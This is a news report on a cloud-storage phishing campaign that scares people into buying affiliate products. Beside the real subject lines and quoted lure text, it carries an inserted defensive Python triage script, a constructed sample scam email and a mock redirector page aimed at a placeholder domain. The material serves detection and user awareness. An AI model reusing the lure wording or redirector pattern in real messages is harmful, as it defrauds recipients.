Based on numerous emails seen by BleepingComputer, the campaign has escalated over the past few months, with people receiving multiple versions of the scam each day, all appearing to be sent by the same scammers.
While the email text varies, the messages all attempt to create a sense of urgency by claiming a payment problem or storage issue must be resolved immediately, or people's files will be deleted or blocked.
The cloud storage scam email campaign
The phishing emails originate from a wide range of domains, with most appearing to be randomly generated for the spam campaign.
The emails themselves use a wide variety of subject lines, all designed to scare a recipient into opening the email.
Example subject lines seen by BleepingComputer include:
- Immediate Action Required. Payment Declined
- Cloud Storage 1TB: Payment overdue
- [personal name]¸Your Account Has been Blocked! Your Photos and Videos will be Removed Fri,30 Jan-2026. take action!!
- We've blocked your account! Your photos and videos will be deleted . Renew your subscription for free now!
- [personal name] - Your store is full , click to check and save 80% , ID#88839
- [personal name], Your Cloud Account has been locked on Mon,26 Jan-2026. Your photos and videos will be removed!
- Sorry [<personal email address>], We Have To Suspend Your Account Today ! Sat,24 Jan-2026
- [name] - Your store is full , click to check and save 80%
- Cloud Storage 1TB: Payment overdue
Many of the subject lines are personalized with the recipient's name or email address and include specific dates or identifiers to increase urgency and make the messages appear legitimate.
The emails seen by BleepingComputer claim that a cloud subscription renewal failed or that a payment method has expired, and warn recipients that backups may stop syncing and that photos, videos, documents, and device backups could be lost if the issue is not resolved.
The messages frequently include made-up account IDs, subscription numbers, and expiration dates to add legitimacy.
"Your Cloud Subscription Is at Risk. We couldn't process your most recent payment. If not resolved, your Cloud storage and backups may be paused," reads an email seen by BleepingComputer.
"Immediate Action Required Please verify or update your payment method as soon as possible to avoid losing access to your photos, files, and device backups."
Every spam email in this campaign contained a link to https://storage.googleapis.com/, part of Google Cloud Storage, where the threat actors hosted static HTML redirector files. When a recipient clicks the link, the hosted page redirects the browser to a scam/phishing site on one of a set of randomly named domains.
All of the links tested by BleepingComputer lead to the same set of scam pages.
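As an added example (not BleepingComputer's code, and not the scam's own pages), the following Python triage helper pulls the URLs out of a message, flags storage.googleapis.com-hosted links together with the urgency phrasing seen in the subject lines listed above, and extracts the destination from a redirector page's HTML without executing it. The sample message, the bucket path, and the destination domain are constructed placeholders (example.net/example.org); the campaign's real domains are not reproduced here.

```python
# Triage helper for cloud-storage scam emails of the kind described above.
# Added example, not BleepingComputer's code; all sample data below is constructed.
from __future__ import annotations

import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser

# Hosting pattern reported for the campaign: a link into Google Cloud Storage
# that serves a static redirector page.
REDIRECTOR_HOST = re.compile(r"^https?://storage\.googleapis\.com/", re.I)

# Urgency/threat phrasing drawn from the subject lines listed above.
URGENCY_TERMS = (
    "immediate action", "payment overdue", "payment declined",
    "account has been blocked", "account has been locked",
    "suspend your account", "will be removed", "will be deleted",
    "store is full", "storage is full",
)

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

# Assignments an inline redirector script uses to send the browser elsewhere.
JS_REDIRECT_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*"
    r"(?:=|\.(?:replace|assign)\s*\()\s*['\"]([^'\"]+)['\"]")


def extract_urls(raw: bytes) -> list[str]:
    """Return every http(s) URL found in the text and HTML parts of a message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    urls: set[str] = set()
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            urls.update(URL_RE.findall(part.get_content()))
    return sorted(urls)


def subject_urgency_hits(raw: bytes) -> list[str]:
    """Urgency phrases present in the Subject header, in URGENCY_TERMS order."""
    subject = str(BytesParser(policy=policy.default).parsebytes(raw)["subject"] or "")
    return [t for t in URGENCY_TERMS if t in subject.lower()]


class _RedirectSniffer(HTMLParser):
    """Find where a static redirector page sends the browser, without running it:
    a <meta http-equiv="refresh"> target or a location assignment in inline script."""

    def __init__(self) -> None:
        super().__init__()
        self.meta_target: str | None = None
        self.script_targets: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content") or "", re.I)
            if m:
                self.meta_target = m.group(1).strip()
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_targets.extend(JS_REDIRECT_RE.findall(data))


def redirect_destination(html: str) -> str | None:
    """Destination of a redirector page: the meta refresh wins, then the first script target."""
    p = _RedirectSniffer()
    p.feed(html)
    p.close()
    return p.meta_target or (p.script_targets[0] if p.script_targets else None)


def triage(raw: bytes, fetched_pages: dict[str, str]) -> dict:
    """Score one message. fetched_pages maps a redirector URL to the HTML an
    analyst retrieved for it in a sandbox (never from the mail client)."""
    urls = extract_urls(raw)
    redirectors = [u for u in urls if REDIRECTOR_HOST.match(u)]
    destinations = {u: redirect_destination(fetched_pages[u])
                    for u in redirectors if u in fetched_pages}
    hits = subject_urgency_hits(raw)
    return {"urgency_terms": hits, "redirector_links": redirectors,
            "destinations": destinations,
            "suspicious": bool(redirectors) and bool(hits)}


# Constructed sample message modelled on the reported campaign (placeholder addresses/bucket).
SAMPLE_EML = b"""\
From: Cloud Billing <billing@example.net>
Subject: Immediate Action Required. Payment Declined
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

We couldn't process your most recent payment.
Update your payment method: https://storage.googleapis.com/example-bucket/notice.html
--b1
Content-Type: text/html; charset="utf-8"

<a href="https://storage.googleapis.com/example-bucket/notice.html">Update payment method</a>
--b1--
"""

# Constructed redirector body as it might be fetched from the bucket (placeholder target).
SAMPLE_REDIRECTOR = """<!doctype html><html><head>
<meta http-equiv="refresh" content="0;url=https://cloud-renewal.example.org/upgrade?ref=a1b2">
</head><body><script>window.location.href="https://cloud-renewal.example.org/upgrade?ref=a1b2";</script>
</body></html>"""
```

Fetch the redirector bodies from an isolated analysis host, not from the recipient's mail client, since the final hop is the monetised page. Real redirectors may obfuscate the script instead of assigning `location` in the clear; when `redirect_destination` returns `None`, fall back to a sandboxed browser and record the observed navigation.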
The phishing pages impersonate cloud service portals and prominently display cloud-themed branding, including the Google Cloud logo. The web pages claim the user's cloud storage is full and warn that photos, videos, contacts, files, and private data are no longer being backed up and will be deleted.
"Because you've exceeded your storage plan, your documents, contacts, and device data are no longer backing up to Cloud and your photos and videos are not uploading to Cloud Photos. Cloud Drive and Cloud-enabled apps are not updating across your devices," reads the phishing site shown below.
"Your data will be lost without security protection if no urgent action is taken."
Clicking on the "Continue" button brings targets to a fake storage scan that always reports that Photos, Cloud Drive, and Mail are all full. The pages then warn that data will be lost unless the cloud storage is upgraded, claiming that the person is eligible for a limited-time "loyalty" upgrade at an 80% discount.
However, clicking the update storage button does not lead to a legitimate cloud services page; instead, the target is redirected to affiliate marketing pages promoting unrelated products.
Products promoted in this phishing campaign include VPN services, little-known security software, and other subscription-based offerings with no connection to cloud storage.
The pages ultimately lead to checkout forms designed to collect credit card details and generate affiliate revenue for the threat actors behind the campaign.
Unfortunately, many people who receive these emails may not realize they're scams and purchase a product they don't need, thinking it will solve the fake cloud storage issues.
It is important to understand that these emails and landing pages are not legitimate cloud service notifications. Legitimate cloud providers do not send emails that lead to storage scans or push third-party security or VPN products to resolve billing issues.
In addition, most legitimate cloud storage providers block access to your additional storage when a payment fails rather than deleting your files immediately.
For example, Google says that if a Google Drive plan is canceled, you will lose access to your additional storage until you make a payment again, and your files will only be deleted after 2 years.
Microsoft OneDrive follows a similar approach but says it may delete files after 6 months if the account exceeds its allocated storage.
Users who receive these spam messages should delete them without clicking any links and not purchase anything promoted through the emails.
As the campaign's goal is to scare recipients into unnecessary purchases, ignoring these messages is the best course of action.
Any concerns about cloud storage or billing should instead be checked manually by visiting the official website or app of the legitimate cloud service.